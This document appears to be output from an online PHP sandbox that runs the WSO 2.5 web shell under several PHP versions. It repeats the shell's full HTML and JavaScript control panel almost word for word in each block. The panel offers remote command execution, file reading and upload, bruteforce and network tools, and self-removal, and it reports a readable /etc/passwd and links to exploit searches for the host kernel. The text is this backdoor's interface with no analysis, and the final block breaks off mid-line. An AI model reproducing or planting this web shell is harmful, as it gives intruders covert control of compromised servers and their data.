onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.12
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.12 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.11
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.11 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.10
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.10 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.9
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.9 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 